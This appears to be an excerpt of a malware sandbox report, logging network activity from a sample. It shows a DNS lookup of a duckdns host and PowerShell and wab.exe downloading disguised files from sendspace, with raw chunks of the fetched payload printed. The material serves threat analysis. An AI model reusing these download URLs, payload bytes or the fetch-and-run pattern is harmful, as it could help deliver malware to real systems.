                                                                                              May 23, 2024 21:03:55.836729050 CEST192.168.2.61.1.1.10x5843Standard query (0)dhhj.duckdns.orgA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              May 23, 2024 21:03:00.233020067 CEST1.1.1.1192.168.2.60xdafNo error (0)www.sendspace.com104.21.28.80A (IP address)IN (0x0001)false
                                                                                              May 23, 2024 21:03:00.233020067 CEST1.1.1.1192.168.2.60xdafNo error (0)www.sendspace.com172.67.170.105A (IP address)IN (0x0001)false
                                                                                              May 23, 2024 21:03:01.119997978 CEST1.1.1.1192.168.2.60x4d47No error (0)fs13n2.sendspace.com69.31.136.57A (IP address)IN (0x0001)false
                                                                                              May 23, 2024 21:03:50.225409985 CEST1.1.1.1192.168.2.60x95cbNo error (0)fs03n5.sendspace.com69.31.136.17A (IP address)IN (0x0001)false
                                                                                              May 23, 2024 21:03:55.983450890 CEST1.1.1.1192.168.2.60x5843No error (0)dhhj.duckdns.org12.202.180.134A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • www.sendspace.com
                                                                                              • fs13n2.sendspace.com
                                                                                              • fs03n5.sendspace.com

                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.649699104.21.28.804435700C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-23 19:03:00 UTC174OUTGET /pro/dl/w4e2qb HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                              Host: www.sendspace.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-05-23 19:03:00 UTC942INHTTP/1.1 301 Moved Permanently
                                                                                              Date: Thu, 23 May 2024 19:03:00 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: SID=lp3b25c2hbnmrb6kb64dvn0hp1; path=/; domain=.sendspace.com
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              Pragma: no-cache
                                                                                              Location: https://fs13n2.sendspace.com/dlpro/5990f4102977ad47c8b1158344464586/664f92e4/w4e2qb/Bystoerrelse.fla
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fiyBzdx6Wfv8lzYgfxG2KvHcOGNfELHzCu66oP4j9zTk%2BE9AmVb1qnPoI37opFa3wvS6VguQOuJ0ThnAay3mm%2BZkSvRvOVjNlN3MwIyCEe106EBn6%2FtreqrxA6PEY1i2V6TAhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 88874db61c9c436d-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-05-23 19:03:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.64970069.31.136.574435700C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-23 19:03:02 UTC235OUTGET /dlpro/5990f4102977ad47c8b1158344464586/664f92e4/w4e2qb/Bystoerrelse.fla HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                              Host: fs13n2.sendspace.com
                                                                                              Connection: Keep-Alive
                                                                                              2024-05-23 19:03:02 UTC501INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 23 May 2024 19:03:02 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 488392
                                                                                              Last-Modified: Mon, 20 May 2024 13:20:02 GMT
                                                                                              Connection: close
                                                                                              Set-Cookie: SID=2dlqm080h9k0t55in6pmpifbu0; path=/; domain=.sendspace.com
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              Content-Disposition: attachment;filename="Bystoerrelse.fla"
                                                                                              ETag: "664b4e02-773c8"
                                                                                              Accept-Ranges: bytes
                                                                                              2024-05-23 19:03:02 UTC15883INData Raw: 36 77 4b 53 42 48 45 42 6d 37 73 32 6e 68 55 41 36 77 4a 5a 7a 75 73 43 36 2b 4d 44 58 43 51 45 63 51 47 62 36 77 4a 4a 34 72 6e 2f 35 74 32 7a 63 51 47 62 63 51 47 62 67 63 45 52 7a 41 77 33 36 77 4c 73 4a 58 45 42 6d 34 48 42 38 45 77 56 46 58 45 42 6d 33 45 42 6d 33 45 42 6d 33 45 42 6d 37 71 45 33 65 47 34 36 77 49 6d 63 4f 73 43 32 70 56 78 41 5a 74 78 41 5a 73 78 79 6e 45 42 6d 2b 73 43 30 33 65 4a 46 41 76 72 41 72 7a 34 63 51 47 62 30 65 4a 78 41 5a 74 78 41 5a 75 44 77 51 54 72 41 6f 50 75 36 77 4c 47 44 49 48 35 69 68 51 42 42 48 7a 4d 63 51 47 62 36 77 49 47 58 59 74 45 4a 41 52 78 41 5a 76 72 41 6a 66 4d 69 63 4e 78 41 5a 76 72 41 6c 4d 6a 67 63 4f 44 4e 43 67 42 36 77 4a 48 78 48 45 42 6d 37 6f 6a 58 46 4b 56 63 51 47 62 36 77 4b 55 77 34 48
                                                                                              Data Ascii: 6wKSBHEBm7s2nhUA6wJZzusC6+MDXCQEcQGb6wJJ4rn/5t2zcQGbcQGbgcERzAw36wLsJXEBm4HB8EwVFXEBm3EBm3EBm3EBm7qE3eG46wImcOsC2pVxAZtxAZsxynEBm+sC03eJFAvrArz4cQGb0eJxAZtxAZuDwQTrAoPu6wLGDIH5ihQBBHzMcQGb6wIGXYtEJARxAZvrAjfMicNxAZvrAlMjgcODNCgB6wJHxHEBm7ojXFKVcQGb6wKUw4H
                                                                                              2024-05-23 19:03:02 UTC16384INData Raw: 31 59 30 66 33 39 4f 72 4b 6e 69 79 37 51 5a 6f 56 36 38 6f 58 4f 64 76 47 35 6b 53 4d 64 53 52 49 49 76 4a 54 39 61 76 74 5a 63 4f 2b 62 61 52 37 4a 46 4d 77 37 49 6e 68 70 31 53 48 4e 4d 54 49 36 43 41 47 45 2f 55 46 64 59 35 68 37 49 66 6c 75 77 73 77 53 65 58 4b 79 66 54 71 79 68 66 31 36 73 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 2b 49 51 31 6d 69 47 77 49 77 4d 6a 4d 6a 58 48 4f 62 57 79 46 30 4e 76 51 36 63 6c 6a 73 42 6d 53 44 52 57 55 45 4c 37 78 4b 70 57 64 6f 71 71 39 78 69 68 4f 52 6b 74 73 6d 55 49 31 6f 73 48 73 64 4b 6d 4d 6b 7a 32 7a 6f 43 74 76 55 50 50 72 53 31 50 56 76 66 71 79 6d 7a 71 65 37 64 48 54 65 4e 32 47 59 6e 48 6a 58 47 63 30 73 2b 66 50 42 73 61 45 6a 52 54 77 52
                                                                                              Data Ascii: 1Y0f39OrKniy7QZoV68oXOdvG5kSMdSRIIvJT9avtZcO+baR7JFMw7Inhp1SHNMTI6CAGE/UFdY5h7IfluwswSeXKyfTqyhf16soX9erKF/Xqyhf16soX9erKF/Xqyhf16soX+IQ1miGwIwMjMjXHObWyF0NvQ6cljsBmSDRWUEL7xKpWdoqq9xihORktsmUI1osHsdKmMkz2zoCtvUPPrS1PVvfqymzqe7dHTeN2GYnHjXGc0s+fPBsaEjRTwR
                                                                                              2024-05-23 19:03:02 UTC16384INData Raw: 6f 5a 64 69 38 7a 65 37 39 56 6b 48 34 64 37 43 44 4d 41 47 52 35 48 63 46 42 6b 6b 64 73 70 33 4a 65 6b 37 50 43 63 7a 70 68 58 42 76 43 30 31 77 4d 35 46 45 54 6d 5a 4b 78 6d 78 72 4f 53 66 68 55 37 2b 57 48 6c 5a 5a 66 78 6d 34 56 70 34 58 36 39 43 4b 6b 39 4d 64 61 76 6b 33 37 66 6f 59 64 4b 4e 34 58 73 2f 41 6b 76 6c 2f 62 69 4e 42 66 52 32 69 32 33 70 47 6e 45 70 79 41 50 46 57 6c 63 46 77 4e 6f 62 42 42 2b 65 71 52 4c 51 79 71 71 79 53 50 62 42 50 78 61 34 43 78 42 62 33 36 69 49 79 4a 65 76 4b 47 50 51 61 50 78 66 31 36 73 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 63 39 68 33 46 50 43 62 73 70 31 2b 5a 2b 6c 74 52 5a 72 57 6f 79 63 73 79 76 48 51 50 65 6e 41 51 6c 68 75 48 42 77
                                                                                              Data Ascii: oZdi8ze79VkH4d7CDMAGR5HcFBkkdsp3Jek7PCczphXBvC01wM5FETmZKxmxrOSfhU7+WHlZZfxm4Vp4X69CKk9Mdavk37foYdKN4Xs/Akvl/biNBfR2i23pGnEpyAPFWlcFwNobBB+eqRLQyqqySPbBPxa4CxBb36iIyJevKGPQaPxf16soX9erKF/Xqyhf16soX9erKF/Xqyhf16soX9erc9h3FPCbsp1+Z+ltRZrWoycsyvHQPenAQlhuHBw
                                                                                              2024-05-23 19:03:02 UTC16384INData Raw: 51 59 70 75 4c 66 41 76 4c 42 6d 68 76 45 32 37 46 4a 7a 31 53 74 4f 32 2f 71 44 73 6f 56 7a 55 4b 77 75 76 57 47 4a 4c 4a 34 46 79 5a 4a 37 70 34 56 77 44 37 73 4d 46 65 45 6f 74 68 32 63 67 36 69 6d 4b 61 70 71 73 69 74 74 78 44 67 55 33 47 37 4a 32 6f 62 2b 72 4b 46 33 51 56 57 62 47 5a 69 38 57 59 51 6d 54 4f 46 36 71 7a 72 4a 49 30 73 45 76 68 54 47 2f 2b 31 51 62 6c 44 53 54 31 36 73 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 4b 47 77 6f 63 59 6d 79 57 2b 75 52 52 64 42 77 35 70 2b 49 6b 53 2b 46 6b 34 55 52 70 6f 6c 56 36 53 4a 64 79 53 2b 42 6d 78 49 32 34 64 42 32 65 30 51 4a 6c 53 39 42 69 65 52 59 6e 64 43 32 6f 4d 36 54 38 51 79 69 31 61 56 63 6b 75 68 31 51 58 6a 72 6a 45 2f
                                                                                              Data Ascii: QYpuLfAvLBmhvE27FJz1StO2/qDsoVzUKwuvWGJLJ4FyZJ7p4VwD7sMFeEoth2cg6imKapqsittxDgU3G7J2ob+rKF3QVWbGZi8WYQmTOF6qzrJI0sEvhTG/+1QblDST16soX9erKF/Xqyhf16soX9erKF/Xqyhf16soX9erKGwocYmyW+uRRdBw5p+IkS+Fk4URpolV6SJdyS+BmxI24dB2e0QJlS9BieRYndC2oM6T8Qyi1aVckuh1QXjrjE/
                                                                                              2024-05-23 19:03:02 UTC16384INData Raw: 78 37 30 6a 4a 67 57 46 44 42 39 48 69 32 4f 2f 38 69 34 63 77 54 68 4f 6b 46 5a 33 4c 62 39 76 41 43 6d 64 54 4d 4b 57 30 69 4b 56 44 79 36 76 54 7a 36 5a 64 57 2b 52 2f 33 44 75 58 34 41 77 71 51 67 79 56 72 57 76 6d 4d 31 58 62 42 78 68 30 33 75 36 4d 70 58 4f 4e 52 55 2f 6d 53 31 54 77 61 7a 6a 74 4f 48 67 67 6c 67 63 74 74 6a 35 32 61 79 43 63 54 78 32 6d 6e 76 66 47 33 35 47 42 31 75 6c 65 32 55 51 32 6f 58 78 68 33 71 49 45 74 6c 65 48 31 6b 73 6f 48 52 55 73 76 46 33 74 62 30 79 77 6d 74 2f 61 4a 38 42 46 4b 2b 32 4c 52 74 49 31 37 37 64 74 54 58 54 47 37 6c 50 5a 75 70 72 2f 2f 74 33 4f 46 36 33 6c 79 67 47 4e 36 73 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 4b 46 2f 76 57 2b 71
                                                                                              Data Ascii: x70jJgWFDB9Hi2O/8i4cwThOkFZ3Lb9vACmdTMKW0iKVDy6vTz6ZdW+R/3DuX4AwqQgyVrWvmM1XbBxh03u6MpXONRU/mS1TwazjtOHgglgcttj52ayCcTx2mnvfG35GB1ule2UQ2oXxh3qIEtleH1ksoHRUsvF3tb0ywmt/aJ8BFK+2LRtI177dtTXTG7lPZupr//t3OF63lygGN6soX9erKF/Xqyhf16soX9erKF/Xqyhf16soX9erKF/vW+q
                                                                                              2024-05-23 19:03:02 UTC16384INData Raw: 42 74 7a 35 78 63 44 70 4c 35 57 45 6d 6e 34 6d 54 30 77 49 57 4a 57 46 66 54 76 66 71 79 70 4d 2f 6a 50 50 47 4d 75 6f 4b 78 46 69 4d 54 75 74 30 77 75 61 32 33 63 5a 4f 38 6e 54 43 43 59 30 4b 36 45 72 70 73 57 76 36 54 39 36 70 70 74 42 77 79 73 67 58 39 51 56 63 44 75 31 72 66 7a 66 33 36 73 72 65 6c 6a 4a 4c 63 63 77 79 53 37 72 56 36 4d 6f 58 67 58 53 71 33 48 52 76 36 68 58 31 36 70 75 2b 61 39 75 4b 36 48 6a 4b 79 42 66 31 6e 7a 31 58 4d 75 70 6e 75 4a 79 72 72 43 34 2b 61 2b 4b 79 35 33 59 76 51 55 75 2b 79 68 66 31 61 7a 51 6e 63 52 6a 75 47 48 71 63 35 42 50 31 74 45 73 6e 69 51 30 6c 6a 6e 54 61 6f 38 48 76 56 73 39 4d 36 35 50 4e 4f 71 4c 30 73 78 41 79 36 67 59 41 2b 50 74 4c 4a 35 6e 31 61 70 5a 30 77 6a 79 61 49 52 44 79 2b 48 54 61 53 64
                                                                                              Data Ascii: Btz5xcDpL5WEmn4mT0wIWJWFfTvfqypM/jPPGMuoKxFiMTut0wua23cZO8nTCCY0K6ErpsWv6T96pptBwysgX9QVcDu1rfzf36sreljJLccwyS7rV6MoXgXSq3HRv6hX16pu+a9uK6HjKyBf1nz1XMupnuJyrrC4+a+Ky53YvQUu+yhf1azQncRjuGHqc5BP1tEsniQ0ljnTao8HvVs9M65PNOqL0sxAy6gYA+PtLJ5n1apZ0wjyaIRDy+HTaSd
                                                                                              2024-05-23 19:03:02 UTC16384INData Raw: 30 4b 35 44 68 2f 51 6d 73 6b 69 53 4d 39 36 50 6d 62 77 6d 65 51 47 2f 4c 46 2f 56 6a 42 4a 61 49 6c 75 31 43 39 65 72 46 6d 43 6c 36 4e 65 69 6a 59 58 2b 53 39 4f 72 4b 4c 79 77 43 73 52 66 31 36 6a 33 56 4e 72 79 66 53 71 7a 72 48 56 35 78 42 30 4f 71 64 4f 76 4b 46 35 4d 64 44 65 5a 59 56 64 72 50 32 59 5a 4c 34 48 2b 4a 41 50 61 54 62 78 43 57 4d 6c 6a 30 69 4b 42 72 44 61 50 77 6b 4e 59 76 50 74 4d 7a 6e 45 68 72 79 78 66 31 6e 32 72 51 63 4b 58 49 46 2f 57 37 6b 42 68 52 61 33 39 59 39 2b 72 4b 5a 53 34 6d 34 5a 5a 41 70 63 67 58 39 52 64 65 6f 33 71 4d 54 39 56 78 49 30 75 53 75 75 6a 4b 46 78 63 68 70 78 66 4f 56 34 55 56 39 65 72 46 6d 74 45 56 4e 65 6a 4d 4f 77 6d 53 4e 51 4a 59 46 2f 58 71 51 38 47 56 35 66 75 76 34 45 5a 59 51 64 67 6c 61 2b
                                                                                              Data Ascii: 0K5Dh/QmskiSM96PmbwmeQG/LF/VjBJaIlu1C9erFmCl6NeijYX+S9OrKLywCsRf16j3VNryfSqzrHV5xB0OqdOvKF5MdDeZYVdrP2YZL4H+JAPaTbxCWMlj0iKBrDaPwkNYvPtMznEhryxf1n2rQcKXIF/W7kBhRa39Y9+rKZS4m4ZZApcgX9Rdeo3qMT9VxI0uSuujKFxchpxfOV4UV9erFmtEVNejMOwmSNQJYF/XqQ8GV5fuv4EZYQdgla+
                                                                                              2024-05-23 19:03:02 UTC16384INData Raw: 75 31 6c 50 6c 73 41 2f 4a 44 30 65 42 49 4f 47 55 66 6d 68 75 35 51 34 44 65 49 73 62 61 79 42 32 73 30 4d 63 38 76 38 45 75 47 44 69 6d 6b 35 2b 58 64 34 66 39 65 70 42 6b 50 58 69 79 68 66 30 47 73 76 66 2b 75 71 66 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 45 74 34 4f 50 6d 72 4f 50 62 41 4e 30 4b 31 69 33 69 7a 44 52 66 37 50 52 42 33 57 54 35 51 30 6c 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 4b 46 2f 58 71 79 67 51 57 6e 32 44 35 6a 38 43 50 73 39 69 41 50 2f 62 77 4c 38 4a 46 54 78 65 63 63 66 4a 72 4f 44 46 4d 4b 74 53 57 42 7a 45 6b 73 65 79 36 56 70 34 56 36 39 71 4b 7a 42 32 35 48 48 65 55 49 62
                                                                                              Data Ascii: u1lPlsA/JD0eBIOGUfmhu5Q4DeIsbayB2s0Mc8v8EuGDimk5+Xd4f9epBkPXiyhf0Gsvf+uqfF/Xqyhf16soX9erKF/Xqyhf16soX9erKF/Xqyhf16soEt4OPmrOPbAN0K1i3izDRf7PRB3WT5Q0l9erKF/Xqyhf16soX9erKF/Xqyhf16soX9erKF/XqygQWn2D5j8CPs9iAP/bwL8JFTxeccfJrODFMKtSWBzEksey6Vp4V69qKzB25HHeUIb
                                                                                              2024-05-23 19:03:02 UTC16384INData Raw: 36 61 50 4c 66 66 46 38 63 46 76 58 71 64 4c 74 4d 4d 6d 59 76 41 6d 73 6b 51 41 63 36 7a 4a 59 44 44 71 7a 6c 63 6d 73 4d 52 4b 76 67 46 42 59 45 59 58 2f 42 39 4f 72 4b 34 44 4d 67 6a 33 2f 73 6a 45 2f 65 4d 75 74 56 4d 52 6c 6f 53 79 59 30 74 70 59 79 64 4e 75 61 61 6b 38 32 72 4a 59 4f 64 42 4f 57 78 4e 46 68 55 58 31 6a 54 2b 54 30 36 73 71 76 35 7a 71 48 42 5a 4e 76 47 53 49 73 37 42 35 50 64 52 48 49 49 67 35 39 4b 6e 65 54 48 51 31 4b 71 4e 2f 2b 56 6f 7a 41 53 32 71 4a 6d 4d 67 58 39 65 56 4f 61 73 55 56 4e 52 59 30 59 55 2f 6b 39 4f 72 4b 6b 79 32 4d 54 38 30 79 36 34 46 78 53 71 5a 4c 4a 73 33 4f 4e 4b 61 54 30 77 6d 57 78 4f 78 36 34 6b 6a 57 4d 70 62 45 52 53 48 75 30 34 78 4c 36 42 50 55 51 35 4a 62 36 38 6f 58 54 53 63 6a 6b 36 4e 75 43 53
                                                                                              Data Ascii: 6aPLffF8cFvXqdLtMMmYvAmskQAc6zJYDDqzlcmsMRKvgFBYEYX/B9OrK4DMgj3/sjE/eMutVMRloSyY0tpYydNuaak82rJYOdBOWxNFhUX1jT+T06sqv5zqHBZNvGSIs7B5PdRHIIg59KneTHQ1KqN/+VozAS2qJmMgX9eVOasUVNRY0YU/k9OrKky2MT80y64FxSqZLJs3ONKaT0wmWxOx64kjWMpbERSHu04xL6BPUQ5Jb68oXTScjk6NuCS
                                                                                              2024-05-23 19:03:02 UTC16384INData Raw: 75 7a 63 35 46 54 7a 2b 53 54 50 46 72 4f 42 53 62 2f 72 32 57 42 32 32 69 5a 37 56 72 43 43 6f 69 52 4e 43 57 42 35 30 61 2b 62 68 6a 79 4e 32 32 71 41 6d 62 56 76 6a 6b 50 6e 32 57 6b 6b 56 39 79 6a 6a 66 71 47 34 78 77 58 63 49 2f 72 74 47 58 34 4d 47 75 66 79 50 54 66 36 6c 36 68 36 65 6c 68 66 56 72 77 4a 2f 65 66 62 71 42 6d 75 51 4f 51 4e 66 2f 33 50 47 44 77 43 41 6e 6b 4e 36 46 39 72 54 48 6b 4c 6b 72 6a 32 4b 44 42 71 61 72 2f 76 52 4a 51 4e 47 2f 43 62 75 72 42 67 79 33 4d 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 4b 46 2f 58 71 79 68 66 31 36 73 6f 58 39 65 72 4b 46 2f 58 2b 34 68 67 78 6a 50 6f 33 67 30 4e 64 4c 4c 67 48 6d 73 53 6d 4c 35 75 75 6c 6c 50 61 42 33 51 62 69 59 61 4c 34 6b 76 57 78 33 76 32 38 33 51 72 42 76
                                                                                              Data Ascii: uzc5FTz+STPFrOBSb/r2WB22iZ7VrCCoiRNCWB50a+bhjyN22qAmbVvjkPn2WkkV9yjjfqG4xwXcI/rtGX4MGufyPTf6l6h6elhfVrwJ/efbqBmuQOQNf/3PGDwCAnkN6F9rTHkLkrj2KDBqar/vRJQNG/CburBgy3MoX9erKF/Xqyhf16soX9erKF/Xqyhf16soX9erKF/X+4hgxjPo3g0NdLLgHmsSmL5uullPaB3QbiYaL4kvWx3v283QrBv


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.649708104.21.28.804435892C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-23 19:03:49 UTC175OUTGET /pro/dl/6f2c5c HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                              Host: www.sendspace.com
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-23 19:03:50 UTC952INHTTP/1.1 301 Moved Permanently
                                                                                              Date: Thu, 23 May 2024 19:03:50 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: SID=8h7tvviacjavkonspru2dnmd45; path=/; domain=.sendspace.com
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              Pragma: no-cache
                                                                                              Location: https://fs03n5.sendspace.com/dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5h0mCJAWOwoSYac16L%2BNEnUDSxp%2BsWgSAShbwpcXRsk3nlW3xKLJydbumVIDTBSdYG4dKaEj0T39%2FmURpmDyBf50iN7EEWhTZAN%2BmHjVR2hvJ%2BDPLjFDDOuI3DtOYS7wwIOdvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 88874ee98d0042f2-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-05-23 19:03:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.64970969.31.136.174435892C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-23 19:03:51 UTC306OUTGET /dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: fs03n5.sendspace.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: SID=8h7tvviacjavkonspru2dnmd45
                                                                                              2024-05-23 19:03:51 UTC430INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 23 May 2024 19:03:51 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 46144
                                                                                              Last-Modified: Mon, 20 May 2024 13:18:49 GMT
                                                                                              Connection: close
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              Content-Disposition: attachment;filename="JXfZIuRPwNaOvold98.bin"
                                                                                              ETag: "664b4db9-b440"
                                                                                              Accept-Ranges: bytes
                                                                                              2024-05-23 19:03:51 UTC15954INData Raw: 34 56 1e 69 6e 7e 40 ef cd 0b 6a b5 77 1f e7 a6 df 3d a2 0c 8e c5 9a 4e ad fa ce c0 12 17 af 81 c4 d5 a7 1f a2 e7 86 ce 85 d8 09 d4 32 15 87 c9 ad f3 33 63 3d cf 06 59 b5 a3 d2 28 ad 4e 31 21 14 a9 48 de 3d e4 db b2 f3 b2 69 8a de f7 03 c5 85 1f d7 8e 63 f4 63 ec 91 76 da 56 36 66 cd 0d 28 e2 be 1b 85 24 85 e3 39 a2 dd c3 0f 04 2c 83 19 fe d4 d1 f3 ff 87 8e 24 72 14 03 47 b1 ed 6b d2 7b 6b 3f b8 88 0b 6a 5a f7 76 51 97 a1 4d ff 63 bf bc 65 38 40 1e 41 1c 3b 57 7d 9b 0c 24 60 9f 10 de 29 13 e4 ca c5 83 bb 36 3e 8c 31 06 be 98 18 dd 7c 3f a9 d8 db 04 ce 38 a5 ea a3 71 9f f2 b0 f1 73 97 3a 5e 64 6c ce 61 a4 cf 73 f1 5a e9 66 ba c9 ef 45 df 20 7d ba 33 17 60 af 88 87 11 9e 6b 4d b8 2d f2 7c 46 83 25 18 21 02 c9 fa 17 f2 5e 63 85 a9 0f b0 f2 5c 00 a6 3f 32 f4
                                                                                              Data Ascii: 4Vin~@jw=N23c=Y(N1!H=iccvV6f($9,$rGk{k?jZvQMce8@A;W}$`)6>1|?8qs:^dlasZfE }3`kM-|F%!^c\?2
                                                                                              2024-05-23 19:03:51 UTC16384INData Raw: f3 20 1b b4 86 bc f4 37 73 cd f5 a0 32 11 7f f4 7e 50 83 d2 4b 31 34 cd a0 e6 ac a5 b1 30 9c 6a 83 cc 4e e5 18 aa 5c c3 33 ad 22 1f a8 3d 63 91 8f 8c 69 79 d4 34 40 d0 62 1e 4a d7 95 08 5c db a6 ae 81 6c ac 80 7e 58 69 9b 99 fb f2 f7 5b 41 ba 09 3e 04 71 0c 02 74 dd af 51 ca 27 63 30 f4 fb ba bf 99 76 78 89 70 bd 8c 7c f1 de 7a 15 d5 16 8c 7d 1b ae f2 3f bc 0e e9 44 a9 ad e6 bd 72 82 14 a8 33 f1 93 c5 18 f2 01 da f3 49 c9 95 41 04 5a da c4 e7 65 87 51 4a 96 06 9d 47 e0 82 2a 5c 97 1f 28 94 7e 60 e4 01 0e 3e b8 8b 38 a4 0e c2 06 fd 29 db c8 d6 31 24 dd a9 2e a8 d9 c5 f6 a3 9b 84 27 cb 0e 67 25 2f 82 29 ef 6e cf 54 f2 f4 ac 3e a2 b1 bf 94 b5 de 72 02 aa 88 b6 ea 54 d1 6c f6 c7 82 8c f7 2b a9 aa d8 94 4d b5 ef a1 8f 6f 3c 0e 54 6e d1 c5 3d ae 81 23 a9 6b 54
                                                                                              Data Ascii: 7s2~PK140jN\3"=ciy4@bJ\l~Xi[A>qtQ'c0vxp|z}?Dr3IAZeQJG*\(~`>8)1$.'g%/)nT>rTl+Mo<Tn=#kT
                                                                                              2024-05-23 19:03:51 UTC13806INData Raw: c2 a0 95 43 bf 65 05 f7 01 6e a5 52 f8 ff f5 a0 7a d9 c5 bd 90 18 15 bf 98 67 68 3a 10 5a b3 d4 ed 2e 3e aa 15 01 bf 40 3b 73 28 a0 ee f3 34 81 6a 4c 6d c1 4f 65 af 44 b8 c0 26 a5 f0 4f 66 ef 4d a3 8a 4e d8 e0 2e 14 fc 23 28 cd 38 8c 41 d6 75 9a 9c b4 f3 c5 c5 79 05 51 21 3e c6 c5 cd b3 27 61 03 17 9a 66 62 f9 49 e4 6d 1b a6 52 09 b6 5d ab a5 84 44 34 57 52 36 a3 31 45 ad 67 a4 19 15 81 79 bf 09 e6 a9 43 a4 3b f3 f0 61 e7 54 23 eb ef 8a 2e 79 d6 f2 ee da 5c 44 33 c2 de d5 a5 ff 02 ca 4b a8 67 19 b3 b7 23 31 48 c3 8e 5d 01 eb b1 e1 3c af eb 96 cc bf 6e 7b 54 e1 f5 95 74 60 9a 75 40 01 f6 2e 63 a8 db 90 ea e4 57 00 e4 c2 79 ef 12 c6 6e 53 2b c4 28 fb d3 e1 74 14 73 a1 24 82 0d 9e c5 ba 27 c3 92 fd f5 73 66 59 37 32 40 00 eb 6b f2 68 f5 50 4d 28 66 5c 5c 3b
                                                                                              Data Ascii: CenRzgh:Z.>@;s(4jLmOeD&OfMN.#(8AuyQ!>'afbImR]D4WR61EgyC;aT#.y\D3Kg#1H]<n{Tt`u@.cWynS+(ts$'sfY72@khPM(f\\;


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

